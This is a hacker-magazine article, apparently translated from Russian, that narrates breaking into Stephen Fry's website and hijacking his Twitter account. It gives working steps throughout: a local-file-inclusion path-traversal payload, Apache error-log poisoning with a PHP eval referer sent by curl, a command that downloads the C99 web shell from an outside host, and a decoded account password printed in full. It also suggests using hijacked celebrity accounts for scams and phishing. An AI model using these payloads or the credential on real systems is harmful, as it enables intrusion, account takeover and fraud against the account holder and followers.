RSS
Hacker Magazine News Articles Bugtrack Forum

Starry Twitter: Hacking the Stephen Fry account

Watching the feeds, ones can often face the news that another Twitter account of some Britney Spears, John McCain and others of that ilk was hacked. Typically, these hacks do not make much effort and are hacked using brute force (stars like to set some simple passwords). But brute force is not our method. British comedian, "The Hitchhiker's Guide to the Galaxy" and "V - for Vendetta" film star, Stephen Fry, can be taken as an example. I will tell you about how to fuck a micro blog famous personality quickly and easily play-by-play.

Micro-blogging

Lets start with the thing that the actor's official website is located at http://www.stephenfry.com. It represents a collection of posts from his blog and forum, gathering of advertising banners and some promotional trailers advertising the works of Fry. Also you can see actors Tweets on stephenfry.com / clubfry / twitter. Inasmuch as Twitter provides its own API to any interested person, then it seemed logical that the password is stored somewhere in the micro-blog configuration map:). In fact, our ultimate goal is a complete control over the actor twitter-account (twitter.com / stephenfry), currently having 873.496 (!) followers.

Bug Search

First off, lets inspect the site for some installed public engines. Big slice of luck, here weve found my favorite WordPress blog engine and the infamous phpBB forum. After browsing the main blog page source (stephenfry.com / blog), one can observe the following:

<meta name="generator" content="WordPress 2.5.1" />

Unfortunately, at the moment I had no necessary exploits for the 2.5.1 WordPress version at hand, and had to ditch that option.

Then we should know the phpBB forum version. This can be done in different ways, but the most convenient is to follow the link to the engine versions history at stephenfry.com / forum / docs / CHANGELOG.html. Inasmuch as the last change was "Changes since 2.0.20", we can safely bottom-line that the forum version is far beyond a real usability of security vulnerabilities (unless, of course, considering all kinds of XSS and CSRF bugs).

Feeling no great desire to use known XSS for this phpBB version, I asked the great and mighty Google for an advice with the query:

site:stephenfry.com filetype:php

As an answer to this uncomplicated query the search engine gave a lot of references to the actor web site PHP-files. I was immediately interested in the link tephenfry.com/section.php?section=clubfry&subsection=twitter.

Here we have two options: we can either send the database a request with the appropriate parameters, or do template files include.

I made the following request having decided to check the second option immediately:

stephenfry.com/section.php?section=clubfry& subsection=/../../../../../../../../../../../../../../../../etc/passwd%00

At that site engine happily gave the contents of / etc / passwd:). There was found the vulnerability of local include working with null-byte! It's all over bar the shouting we had just to find out which file can be stuffed with malicious code.

Helpful logs

If youve read my article in the last ][ number, you should know about the wonderful way to inject your code through the various symbolic links located in / proc / self / *.

Lets try using storage of local variables /proc/self/environ:

stephenfry.com/section.php?section=clubfry&subsection=/../../../../../../../../../../../../../../../../proc/self/environ%00

Unfortunately, / proc / self / environ is not available :(.

Now its time to try to include our code to the log files. By trial and error weve revealed that Apache error_log locates at /proc/self/fd/2 (well use it cause the access_log of a common web site is certainly about few gigabytes, that would be immune to LFI).

error_log is often written without filtering the referer variable, which can be injected with our PHP-code. The only thing thats left to do is to cause the error, which will be written to the log file. The most easily achievable is the following error format:

[Sat Jul 11 23:39:21 2009] [error] [client x.x.x.x] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /

To get such an error and write our evil-code we just need to send a blank header to the appropriate host. You can do it like this:

z:/usr/local/bin/curl.exe "http://www.stephenfry.com/" -H "Host:" --referer "<?php eval($_GET[cmd]); ?>"

As a result, our code will be written to the error_log:

[Sat Jul 11 23:39:21 2009] [error] [client x.x.x.x] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /, referer: <?php eval($_GET[cmd]); ?>

- Well be able to perform any commands using the following link:

http://www.stephenfry.com/section.php?section=clubfry& subsection=/../../../../../../../../../../../../../../../../proc/self/fd/2%00&cmd=phpinfo();

The Penetration

After further browsing and use of the find. /-Type d-perm 0777 command weve found out that there are several writable directories at the server. I chose / home / fry / public_html / img / blog_thumbs / directory and uploaded the C99madShell (it was named like blog.php) there with wget agent:

http://www.stephenfry.com/section.php?section=clubfry&subsection=/../../../../../../../../../../../../../../../../proc/self/fd/2%00&cmd=system('wget -O /home/fry/public_html/img/blog_thumbs/blog.php http://madnet.name/files/download/9_c99madshell.php');

The main thing is to get the access to the Frys adored Twitter. We will start our search with browsing the index.php file source at as / home / fry / public_html:

<?php
include_once("lib/sf_main.php");
$aryBlogEntry = fnGetHomepageBlogArray();
$aryBlogStats = fnGetBlogStatsArray();
$aryForumStats = fnGetForumStatsArray();
$strSection = "";
$strSubSection = "";
include(SF_BASE_DIR."/templates/navigation/header.php");
Then the lib/sf_main.php:
<?php
include_once "sf_constants.php";
include_once "sf_db_class.php";
include_once "sf_template.php";
include_once "sf_cache_functions.php";
...
?>

And at last the lib/sf_constants.php:

<?php
...
// Twitter
define('SF_TWITTER_USER','stephenfry');
define('SF_TWITTER_PASSWORD','dzQxbGE4eW9uMzd3bzQ=');
...
?>

As seen, the variable SF_TWITTER_PASSWORD is base64 encoded, so we just have to miss this value through the base64_decode function and well get the final password w41la8yon37wo4.

The ultimate goal has almost been reached! Weve received the password (by the way, such password seems hardly possible to be found by the brute force). The main thing that has left is to enter the actor's account at twitter.com, and leave there a message for future generations.

Twitter

Now we enter the twitter.com, fill in the appropriate username and password stephenfry w41la8yon37wo4 and find ourselves logged in to the Frys account :). After login the service gives us a simple question: "What are you doing?", which we answer with the following happy phrase "I'll be watching you! From Russia with love :)". Within a few minutes after sending my message, Stephen fans began to post the answers:

RegNomSongs by The Police and Matt Monroe. This is a quiz, right? RT @stephenfry:
I'll be watching you! From Russia with love :)

---
lokimaros@stephenfry How about how radically
changed your life and listening habits.
---
NikkiG57@stephenfry tell them about Russia, Wagner and your performance at
Glastonbury
---
valpanna@stephenfry I am afraid, very afraid!
---
Benn2100@stephenfry I'll be watching you too
---
thisheartbeatz@stephenfry have fun in RUSSIA! B)
---
wrathofagony@stephenfry cool in Russia? how is it???
---
CybrHwk@stephenfry Your in Russia? Where about in Russia are you Stephen?
---
chriscattaneoRT @stephenfry: I'll be watching you! From Russia with love :) ok
James!
---
Betty_Bitch@stephenfry and i'll be watching you on dave, from Wales with love :)
---
sjoes@stephenfry Are you in still Russia?
---
mio@stephenfry wow o_0 where are you now, Stephen?

It seems like no one guessed that the actor's account was hacked, and the phrase "From Russia with love" does not mean that Fry is in Russia.

Large-scale flash mob

Having seized some star personality account at some popular online service, you can arrange not only the large-scale flash mob, but also a full-fledged scam / phishing / spam attack. But, of course, the most amusing thing in such situation was the recent message about the Britney Spears death posted on her Twitter :).

P.S. I deleted that post from his micro-blog a few minutes later, cause my delicate mental organization didnt allow me to injure a huge army of Stephen Fry fans.

INFO

Stephen Fry (Stephen John Fry) - British writer, actor and playwright. The role in ("The Black Adder", "A Bit of Fry and Laurie" and "Jeeves and Wooster") the television comedy series won him glory. Outside the UK Fry is known mainly for the Oscar Wilde role in the "Wilde" (1997) movie. Fry is the author of articles and columns in several leading newspapers and magazines in addition to writing scripts and texts for television, radio, cinema and theater.

DANGER

The above article is the product of a diseased imagination of the author. Any overlap with existing site is accident. Neither the editors nor the author shall not be liable for any possible damage caused by the materials of this article.




: .
, .

    Rambler's Top100